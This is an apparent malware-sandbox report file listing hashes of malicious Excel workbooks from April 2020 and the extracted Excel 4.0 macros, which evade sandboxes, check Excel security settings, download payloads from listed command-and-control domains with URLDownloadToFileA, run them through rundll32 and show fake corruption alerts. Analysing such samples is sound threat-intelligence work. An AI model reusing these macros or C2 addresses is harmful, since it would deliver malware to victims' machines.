],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"whsxzBnZnQ\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"109ec3ef59117a06e0693b4a048c1736c5f9a766c5ac92c5cafd3c7f724fd1b3"},"analysis":{"reported":"2020-04-09T16:14:58Z","score":10},"files":[{"filename":"109ec3ef59117a06e0693b4a048c1736c5f9a766c5ac92c5cafd3c7f724fd1b3","filesize":206336,"md5":"f539680262bc5aacdbc2907302f6f4b4","sha1":"3d2a9414c5fe773642c81b5b97a2cac3e27c8a52","sha256":"109ec3ef59117a06e0693b4a048c1736c5f9a766c5ac92c5cafd3c7f724fd1b3","sha512":"1b0bd2cc14b57952967e887fc28467d9e422b50688a18c58859869abc34f170a3ac1c7275fa416e8ea480e87f683ef526c50af5b74f16ee177bfcca6795ed684","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"109ec3ef59117a06e0693b4a048c1736c5f9a766c5ac92c5cafd3c7f724fd1b3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EDJg37rumR\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"10a1237eb29091b3111dd3946dc4ceace76c3dbf949d54f96fac2d0355d666bb"},"analysis":{"reported":"2020-04-09T16:14:58Z","score":10},"files":[{"filename":"10a1237eb29091b3111dd3946dc4ceace76c3dbf949d54f96fac2d0355d666bb","filesize":167936,"md5":"4d2db45a66a4aa534233d9826c30cc04","sha1":"c80a61aa7267e9053b2e5fcab452a352f55f0eab","sha256":"10a1237eb29091b3111dd3946dc4ceace76c3dbf949d54f96fac2d0355d666bb","sha512":"537e6bbfeecad8a825fad18b6006c6d197121416dce8ae964fca1b445c93ace0eb1abb81f829915f940c5b8429a996391db1c5ccb06638995d272d2b4202b204","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"10a1237eb29091b3111dd3946dc4ceace76c3dbf949d54f96fac2d0355d666bb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lyeCOrVuiQ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"10aa31df7f5e7f9bfb699ff6c00d387e8798872293cd1221ef70c927d89b8afd"},"analysis":{"reported":"2020-04-09T16:14:58Z","score":10},"files":[{"filename":"10aa31df7f5e7f9bfb699ff6c00d387e8798872293cd1221ef70c927d89b8afd","filesize":168960,"md5":"d3c2f10139ceaabdccf4a5f8b6f712c1","sha1":"916cf34c6e7d6dcad6bd3cebbf30eb1ceda586dd","sha256":"10aa31df7f5e7f9bfb699ff6c00d387e8798872293cd1221ef70c927d89b8afd","sha512":"715d5c2626834daa81363ea9b2c9249ea8b8f4285376ac2c18a3773bbf79bb85135407e533ea5098c4f4d56ae2afbd7169a7115da6cfd45af9cf7f7e168d262c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"10aa31df7f5e7f9bfb699ff6c00d387e8798872293cd1221ef70c927d89b8afd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cxmaAn6Ztm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"10ce3e23545362b146f1fc2d8cd2e23c2c9d03a76b5e887595310a09adf8e109"},"analysis":{"reported":"2020-04-09T16:14:58Z","score":10},"files":[{"filename":"10ce3e23545362b146f1fc2d8cd2e23c2c9d03a76b5e887595310a09adf8e109","filesize":160768,"md5":"3cb55ff4f56e62710f56ab7d4e4282f4","sha1":"df7be24251f8ddab80e0ef32a859052aeec47565","sha256":"10ce3e23545362b146f1fc2d8cd2e23c2c9d03a76b5e887595310a09adf8e109","sha512":"92ba8325b315e83358f45564ad0e53502ca44e68e07d25ad2ca00db47d310516e78a9898e1e922a38a4705e72210cd8401e83876503ae11035b5a7a65a1a3cd3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"10ce3e23545362b146f1fc2d8cd2e23c2c9d03a76b5e887595310a09adf8e109.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mYdS2gqP3A\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"10f9e5db5924843178303a680b747e3d2a9a786f6ab0e95fa6c635dac69c9ea7"},"analysis":{"reported":"2020-04-09T16:14:58Z","score":10},"files":[{"filename":"10f9e5db5924843178303a680b747e3d2a9a786f6ab0e95fa6c635dac69c9ea7","filesize":160768,"md5":"80f74473342ca26134668d7abdc0a565","sha1":"d3b1fca7007da058dfffddf516d2c26efbf93f96","sha256":"10f9e5db5924843178303a680b747e3d2a9a786f6ab0e95fa6c635dac69c9ea7","sha512":"bc2d2ab5c34e81c95aed493b0eba36408318afc052410f0783e69e07cbcfb765058681a25f927b3f558bed6d7d6d4b30565c4dfbf8ef1c5b28d85ffd6ddf6a53","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"10f9e5db5924843178303a680b747e3d2a9a786f6ab0e95fa6c635dac69c9ea7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"L5O7SwXWJ5\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"11141381889ba5b43ed66cc1fed1d77e49bdfd0b657ad6de9eaf028958186c35"},"analysis":{"reported":"2020-04-09T16:14:58Z","score":10},"files":[{"filename":"11141381889ba5b43ed66cc1fed1d77e49bdfd0b657ad6de9eaf028958186c35","filesize":185344,"md5":"182fab5e9f363fe2d8177c20f88c53d1","sha1":"f9bcf4bc12bb2a905d9dea52bee41fc8ec126faf","sha256":"11141381889ba5b43ed66cc1fed1d77e49bdfd0b657ad6de9eaf028958186c35","sha512":"9405f0d998c3bf7db0f975c9e23418a07e64de9528a30c3ba2d722634b2197e1c72f9e5eed190f94679b44107a76a675d32f92a7b0eb2ddd46d20c995349086e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"11141381889ba5b43ed66cc1fed1d77e49bdfd0b657ad6de9eaf028958186c35.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"11158ac54c6747c30b43bea59543b4fb3be06521072dda5ece4bd8b81efba03f"},"analysis":{"reported":"2020-04-09T16:14:58Z","score":10},"files":[{"filename":"11158ac54c6747c30b43bea59543b4fb3be06521072dda5ece4bd8b81efba03f","filesize":209920,"md5":"af6ac01377522e8c9b7df0804b254930","sha1":"13e8a4326bbab35386e04b6ad47d11d1d0d6b24d","sha256":"11158ac54c6747c30b43bea59543b4fb3be06521072dda5ece4bd8b81efba03f","sha512":"46e0bca9ee0a7c172042de1a59f4fd23ffb8ca116dc8b1030af5335dfbcbed3bb430d17be93e27d46f3882478c530af3829bd49b0ab7b90a4f8fd7350bf41a52","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"11158ac54c6747c30b43bea59543b4fb3be06521072dda5ece4bd8b81efba03f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KG8lyhmdTp\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1123ad649e7ff44e8c04887bd64ea6944b93072f09297d7cb455ea06e3722e4c"},"analysis":{"reported":"2020-04-09T16:14:58Z","score":10},"files":[{"filename":"1123ad649e7ff44e8c04887bd64ea6944b93072f09297d7cb455ea06e3722e4c","filesize":177152,"md5":"02304c38838d64b753a6021f9768339f","sha1":"0dad7c4d02e1ecd72a6a2c39a3534a279f96975b","sha256":"1123ad649e7ff44e8c04887bd64ea6944b93072f09297d7cb455ea06e3722e4c","sha512":"fec51d48968ba991e2d7257970c79de25044490d0693c14ecb6d5eaf172bf215b9a09f23c47c892b5c0d6bf68b040ac5277721356b2a8df1156b01f6bcef3f34","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1123ad649e7ff44e8c04887bd64ea6944b93072f09297d7cb455ea06e3722e4c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"xEbJPXoCcP\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"11439ca7fc3cf32c89468998915bb4b32feb3e26ac0d406aab4b06949dbb8384"},"analysis":{"reported":"2020-04-09T16:14:58Z","score":10},"files":[{"filename":"11439ca7fc3cf32c89468998915bb4b32feb3e26ac0d406aab4b06949dbb8384","filesize":185344,"md5":"7b5c62cc9a7269970605e230d47b761c","sha1":"bf675ec32e1fc5228a2dc3b0e705c20e47f53afb","sha256":"11439ca7fc3cf32c89468998915bb4b32feb3e26ac0d406aab4b06949dbb8384","sha512":"9727e73dea3c495f4fb6099331400e709b7a97bcd7d5755bc9d121652a2afd0583f511393384ab545223f331c3cbead91ac2a7483e66f8055b2972ea6c1f6477","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"11439ca7fc3cf32c89468998915bb4b32feb3e26ac0d406aab4b06949dbb8384.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"115174ad831aae86edc57585ba028a2ff39caf108200b396453e3a96b2fcb3c3"},"analysis":{"reported":"2020-04-09T16:14:58Z","score":10},"files":[{"filename":"115174ad831aae86edc57585ba028a2ff39caf108200b396453e3a96b2fcb3c3","filesize":152576,"md5":"ee10ac9a5f649175e240f918e06bdfa0","sha1":"4f3f03b802aa578525d6513c6595647659bbcd44","sha256":"115174ad831aae86edc57585ba028a2ff39caf108200b396453e3a96b2fcb3c3","sha512":"e8f58e0e367f5ed86e72739e130265f4106b40671ae34034d117f44cc41555f0702c7aed15d5bfa915215b6de5412146951ad629ab7d6a9f1d2c75c5310f03d0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"115174ad831aae86edc57585ba028a2ff39caf108200b396453e3a96b2fcb3c3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"smFU9sHl7q\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"116661c1c25d7b21776053f62711b7c04efb350561b310746ada43086d414bcc"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"116661c1c25d7b21776053f62711b7c04efb350561b310746ada43086d414bcc","filesize":209920,"md5":"5bbe4a34282c048b3738e2f6500147e9","sha1":"3c9ea0915279dff4c99a20418826dc64ede4c973","sha256":"116661c1c25d7b21776053f62711b7c04efb350561b310746ada43086d414bcc","sha512":"58ef80214f11dc8a49e0a2fb5f1302c999501ce7a3824d2a82fae792afbac00f9a0b43d5e71e42e35efdf899639671bd89ba2e3f19934d0cbaa1db6b36968690","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"116661c1c25d7b21776053f62711b7c04efb350561b310746ada43086d414bcc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SxUWTKtNFO\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"116933b686c96b918c01149103d98a8bbf874d797cac6e2b796140bc665652e6"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"116933b686c96b918c01149103d98a8bbf874d797cac6e2b796140bc665652e6","filesize":225280,"md5":"7ba9223340cb87b3a0e4b13a459c1a48","sha1":"4d124ab1e9b9352ec1987880c0c26bf4585586c6","sha256":"116933b686c96b918c01149103d98a8bbf874d797cac6e2b796140bc665652e6","sha512":"32abc26bf025c9e4adea8f119d838011f6d1bb6cdd737428f2e9a62dd0596a83209a708ace09728153b04dc9afb602c6559ee4f1a2e5997dcf84d850a1c25de5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"116933b686c96b918c01149103d98a8bbf874d797cac6e2b796140bc665652e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Y7mHPUKUqE\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"116d7f54190efa745ede5b225e6e900c11e513e37b94eef987989b30493dbeb6"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"116d7f54190efa745ede5b225e6e900c11e513e37b94eef987989b30493dbeb6","filesize":185344,"md5":"993c1b97c0dbb773c31d2eb5c8c0e3c8","sha1":"19b5a7197d393d561b0913ba67604469e32ba089","sha256":"116d7f54190efa745ede5b225e6e900c11e513e37b94eef987989b30493dbeb6","sha512":"e6cba9893c07749e8cc595343eadb4e546c1c14ca72c239f578768b453047e15a29d682c47ba90e2c0f157c011d17589c0fb51e416fd12b91da72fbee63e10d9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"116d7f54190efa745ede5b225e6e900c11e513e37b94eef987989b30493dbeb6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"118cf58b26817bd9d1ee7ff892ef46a2bf209bcf405b30d30d82bc801e88a260"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"118cf58b26817bd9d1ee7ff892ef46a2bf209bcf405b30d30d82bc801e88a260","filesize":167936,"md5":"45b67bfc27be357fc59f6a0849ed548c","sha1":"5b36bf8d7ca023aab141969dde7ffb196c6f035d","sha256":"118cf58b26817bd9d1ee7ff892ef46a2bf209bcf405b30d30d82bc801e88a260","sha512":"cc53c52b9fbe4fade25cdb07c4c14a44d5ee961c86c58f10a610001384784398f92f2d56aef5ddf7c784b151292ea164fb9d57c91a0c421a2266d2ab27f3e070","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"118cf58b26817bd9d1ee7ff892ef46a2bf209bcf405b30d30d82bc801e88a260.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vAwg77xZCU\",TRUE)\nGOTO(R$0C$19)"}}}]}
